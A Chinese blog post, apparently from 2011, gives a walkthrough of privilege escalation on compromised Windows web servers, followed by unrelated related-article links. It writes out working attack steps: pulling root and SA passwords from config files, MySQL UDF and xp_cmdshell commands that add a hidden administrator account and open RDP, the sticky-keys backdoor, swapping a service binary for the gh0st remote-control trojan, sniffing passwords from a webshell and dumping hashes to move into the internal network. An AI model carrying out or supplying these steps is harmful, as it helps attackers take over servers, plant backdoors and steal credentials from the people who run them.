服务器权限提升的一些技巧

原创 2011年01月13日 15:09:00

  查找配置文件,翻阅网站目录下的 config.asp config.php conn.asp inc目录查找 具有高权限的账号和密码

  比如说: root 密码 SA的密码。

  // [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商

  $dbhost = 'localhost';

  // 数据库服务器

  $dbuser = 'root';

  // 数据库用户名

  $dbpw = '123';

  // 数据库密码

  $dbname = 'discuz';

  // 数据库名

  $pconnect = 0;

  // 数据库持久连接 0=关闭, 1=打

  得到root 帐户密码:

  root

  123

  利用MySQL root 提权

  DLL已成功的导出到c://windows//system32//mysqlDll_1269695183.dll

  Function 'state' already exists

  select state("net user yhsafe yhsafe /add")

  SQL语句成功执行:Resource id #2

  Array

  (

  [0] => 命令成功完成。

  succeed!

  [state("net user yhsafe yhsafe /add")] => 命令成功完成。

  succeed!

  )

  利用 SA来提权

  server=localhost;UID=saWD=123;database=masterrovider=SQLOLEDB

  执行xp_cmdshell 假如没有,记得先恢复xp_cmdshell

  Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'

  Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'

  开启3389:

  Exec master.dbo.xp_cmdshell 'C:/inetpub/wwwroot/bbs/3389.exe 3389'

  返回结果:

  Now opening terminate service...success!

  5.2

  OK...

  开启成功

  2.利用一些软件配置漏洞,或者本地来进行提权。

  "巴西烤肉"提权:

  webshell下执行 ch.exe "net user 123 123 /add"

  360提权:

  360.exe 3389 //这样的话就开启了远程桌面

  按5下shift 就出弹出CMD

  3.替换服务法

  C:/ftp/FtpServer.exe

  对FtpServer.exe 重命名为 FtpServer1.exe

  上传一个反弹的远程控制程序。比方 gh0st

  gh0st 重命名为FtpServer.exe

  4.打破常规用webshell来进行Sniffer

  能Sniffer到整个服务器的FTP HTTP这类密码。

  需要用到Wireshark 专业工具来查看密码。

  5.dump 密码

  dump 需要administrator 甚至 system权限

  dump出hash 进而对内网进一步渗透

服务器权限提升

当我们拿到webshell之后,下一步该干什么? 权限提升啊!!! 一、介绍 通过上传、SQL注入、任意代码执行等最初的漏洞利用,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比...

文件服务器带权限迁移

  • 2015年10月29日 17:19
  • 837KB
  • 下载

UAC技巧:使 Windows 内置程序默认以管理员权限运行

遇到的问题:安装win7并且新创建了一个登录用户admin,并且设置为管理员。可是每次还是必须单击右键,点击“以管理员权限运行”;想要以管理员权限打开命令行提示符cmd也不行(网上找了些方法还是很麻烦...
  • my_xxh
  • my_xxh
  • 2015年02月09日 15:58
  • 667

restful项目的权限控制实现技巧

最近的项目在用restful风格在写,果然url都有了意义,功能都可以从url中推测出来,restful的url和非restful的url最大的一个感官区别就是,rest的url可能存在一些变量,比如...

sap BASIS,SAP服务器及权限管理

  • 2011年09月28日 11:12
  • 1.34MB
  • 下载

详解VS2008下打包安装程序的一些技巧(含win7下提权限、卸载以及安装时定向到网页)

笔者才疏学浅,文中叙述不当之处还望各位园友指出~       1、怎么使得程序窗口左上角和任务栏有图标,如下图所示:                                 ...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:服务器权限提升的一些技巧
举报原因:
原因补充:

(最多只允许输入30个字)